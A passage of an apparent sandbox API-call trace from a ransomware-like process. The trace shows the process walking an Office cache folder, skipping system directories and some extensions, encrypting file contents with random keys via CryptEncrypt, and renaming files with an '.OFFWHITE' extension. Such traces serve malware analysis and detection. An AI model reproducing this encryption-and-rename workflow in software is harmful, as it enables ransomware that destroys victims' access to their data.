hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x10b2, lpOverlapped=0x0) returned 1 [0087.068] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.068] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x10b2, lpOverlapped=0x0) returned 1 [0087.068] GetProcessHeap () returned 0x500000 [0087.068] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.068] CloseHandle (hObject=0x21c) returned 1 [0087.072] GetProcessHeap () returned 0x500000 [0087.072] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.072] GetProcessHeap () returned 0x500000 [0087.072] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.072] GetProcessHeap () returned 0x500000 [0087.072] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.072] GetProcessHeap () returned 0x500000 [0087.073] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.073] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0087.073] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE" [0087.073] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.offwhite")) returned 1 [0087.073] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0087.073] lstrcmpiW (lpString1="ose.exe", lpString2=".") returned 1 [0087.073] lstrcmpiW (lpString1="ose.exe", lpString2="..") returned 1 [0087.073] lstrcmpiW (lpString1="ose.exe", lpString2="...") returned 1 [0087.073] lstrcmpiW (lpString1="ose.exe", lpString2="windows") returned -1 [0087.073] lstrcmpiW (lpString1="ose.exe", lpString2="$recycle.bin") returned 1 [0087.073] lstrcmpiW (lpString1="ose.exe", lpString2="rsa") returned -1 [0087.074] lstrcmpiW (lpString1="ose.exe", lpString2="ntuser.dat") returned 1 [0087.074] lstrcmpiW (lpString1="ose.exe", lpString2="programdata") returned -1 [0087.074] lstrcmpiW (lpString1="ose.exe", lpString2="appdata") returned 1 [0087.074] lstrcmpiW (lpString1="ose.exe", lpString2="program files") returned -1 [0087.074] lstrcmpiW (lpString1="ose.exe", lpString2="program files (x86)") returned -1 [0087.074] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.074] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="ose.exe" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" [0087.074] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.074] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.074] PathFindExtensionW (pszPath="ose.exe") returned=".exe" [0087.074] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0087.074] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2=".") returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="..") returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="...") returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="windows") returned -1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="$recycle.bin") returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="rsa") returned -1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="ntuser.dat") returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="programdata") returned -1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="appdata") returned 1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="program files") returned -1 [0087.074] lstrcmpiW (lpString1="osetup.dll", lpString2="program files (x86)") returned -1 [0087.074] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.074] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="osetup.dll" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" [0087.074] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.074] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.074] PathFindExtensionW (pszPath="osetup.dll") returned=".dll" [0087.074] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0087.074] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0087.075] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0087.075] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0087.075] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0087.075] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0087.075] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0087.075] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0087.075] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2=".") returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="..") returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="...") returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="windows") returned -1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$recycle.bin") returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="rsa") returned -1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="ntuser.dat") returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="programdata") returned -1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="appdata") returned 1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="program files") returned -1 [0087.075] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="program files (x86)") returned -1 [0087.075] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.075] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="OWOW32WW.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0087.075] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.075] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.075] PathFindExtensionW (pszPath="OWOW32WW.cab") returned=".cab" [0087.075] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.075] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.075] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.075] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0087.075] lstrcmpiW (lpString1="PidGenX.dll", lpString2=".") returned 1 [0087.075] lstrcmpiW (lpString1="PidGenX.dll", lpString2="..") returned 1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="...") returned 1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="windows") returned -1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$recycle.bin") returned 1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="rsa") returned -1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="ntuser.dat") returned 1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="programdata") returned -1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="appdata") returned 1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="program files") returned -1 [0087.076] lstrcmpiW (lpString1="PidGenX.dll", lpString2="program files (x86)") returned -1 [0087.076] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.076] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="PidGenX.dll" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0087.076] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.076] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.076] PathFindExtensionW (pszPath="PidGenX.dll") returned=".dll" [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0087.076] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0087.076] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="...") returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="windows") returned -1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$recycle.bin") returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="rsa") returned -1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="ntuser.dat") returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="programdata") returned -1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="appdata") returned 1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="program files") returned -1 [0087.076] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="program files (x86)") returned -1 [0087.077] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.077] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="pkeyconfig-office.xrm-ms" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0087.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.077] PathFindExtensionW (pszPath="pkeyconfig-office.xrm-ms") returned=".xrm-ms" [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".exe") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".log") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cab") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cmd") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".com") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cpl") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".ini") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".dll") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".url") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".ttf") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".mp3") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".pif") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".mp4") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".OFFWHITE") returned 1 [0087.077] lstrcmpiW (lpString1=".xrm-ms", lpString2=".msi") returned 1 [0087.077] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.077] GetProcessHeap () returned 0x500000 [0087.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d18 [0087.077] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.078] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=715834) returned 1 [0087.078] GetProcessHeap () returned 0x500000 [0087.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.078] GetProcessHeap () returned 0x500000 [0087.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.078] GetProcessHeap () returned 0x500000 [0087.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.078] GetProcessHeap () returned 0x500000 [0087.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.078] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.078] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.078] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.078] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.079] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaec3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.079] SetLastError (dwErrCode=0x0) [0087.079] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.081] GetLastError () returned 0x0 [0087.082] GetLastError () returned 0x0 [0087.082] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaed3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.082] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.082] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaee3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.082] WriteFile (in: hFile=0x21c, lpBuffer=0x547d18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.082] GetProcessHeap () returned 0x500000 [0087.082] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xaec3a) returned 0x2960020 [0087.082] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.082] ReadFile (in: hFile=0x21c, lpBuffer=0x2960020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295e540*=0xaec3a, lpOverlapped=0x0) returned 1 [0087.142] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.142] WriteFile (in: hFile=0x21c, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0xaec3a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295e54c*=0xaec3a, lpOverlapped=0x0) returned 1 [0087.145] GetProcessHeap () returned 0x500000 [0087.145] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0087.158] CloseHandle (hObject=0x21c) returned 1 [0087.165] GetProcessHeap () returned 0x500000 [0087.165] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.165] GetProcessHeap () returned 0x500000 [0087.165] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.165] GetProcessHeap () returned 0x500000 [0087.165] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.165] GetProcessHeap () returned 0x500000 [0087.165] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.165] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0087.165] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE" [0087.165] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.offwhite")) returned 1 [0087.166] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2=".") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="..") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="...") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="windows") returned -1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="$recycle.bin") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="rsa") returned -1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="ntuser.dat") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="programdata") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="appdata") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="program files") returned 1 [0087.166] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="program files (x86)") returned 1 [0087.166] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.167] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="ProPlusrWW.msi" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" [0087.167] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.167] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.167] PathFindExtensionW (pszPath="ProPlusrWW.msi") returned=".msi" [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", 